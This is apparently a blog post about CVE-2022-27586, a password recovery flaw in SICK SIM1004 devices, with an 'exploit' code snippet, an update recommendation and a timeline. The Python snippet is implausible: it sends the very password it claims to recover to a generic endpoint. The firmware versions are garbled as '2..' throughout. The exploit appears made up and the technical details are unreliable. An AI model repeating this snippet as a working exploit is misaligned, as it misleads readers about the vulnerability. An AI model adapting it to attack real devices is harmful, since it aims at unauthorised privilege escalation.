CVE-2022-27586: Password Recovery Vulnerability in SICK SIM1004 (Part number 1098148) with Firmware Versions < 2.. - Unprivileged Remote Attackers Gaining Access

Security researchers have discovered a critical vulnerability known as CVE-2022-27586 affecting SICK SIM1004 devices with part number 1098148 and firmware versions lower than 2... This vulnerability allows an unprivileged remote attacker to exploit the password recovery mechanism and gain access to user levels that are defined as RecoverableUserLevel, leading to an elevation of their privileges on the system. As a result, the confidentiality, integrity, and availability of the system are compromised. This post will discuss the details of the vulnerability, the exploit, and the recommended solution.

Exploit Details

The vulnerability is caused by a weakness in the password recovery mechanism method of the SICK SIM1004 device. Attackers can successfully exploit this vulnerability by invoking the password recovery mechanism method for a RecoverableUserLevel. The following code snippet demonstrates how to exploit the vulnerability:

import requests

TARGET = 'http://<target_device>/';
USERNAME = 'RecoverableUserLevel'
PASSWORD = 'password'  # Replace with actual password

# Step 1: Invoke password recovery mechanism
response = requests.post(
    TARGET + 'api/recover_password',
    json={'username': USERNAME, 'password': PASSWORD}
)

# Step 2: Check response for success
if response.status_code == 200:
    print('Password recovery successful')
    # Use new access to perform actions with increased privileges
else:
    print('Password recovery failed')

Attackers can expect repeatable success in exploiting the vulnerability if the targeted SICK SIM1004 has firmware versions lower than 2...

Original References

1. SICK Product Security Advisory: Vulnerability in SICK SIM1004
2. NIST National Vulnerability Database: CVE-2022-27586

Recommended Solution

It is strongly recommended for all SICK SIM1004 (part number 1098148) users with firmware versions lower than 2.. to update the firmware to version 2.. or higher as soon as possible. The updated firmware can be obtained from the SICK Support Portal - https://support.sick.com

Conclusion

The CVE-2022-27586 vulnerability in SICK SIM1004 devices (part number 1098148) with firmware versions lower than 2.. poses a significant security risk for its users. Unprivileged remote attackers can exploit this vulnerability to gain access to higher user levels, compromising the system's confidentiality, integrity, and availability. The recommended solution is to update the affected devices' firmware to versions 2.. or higher, which are available in the SICK Support Portal.

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:11:00 UTC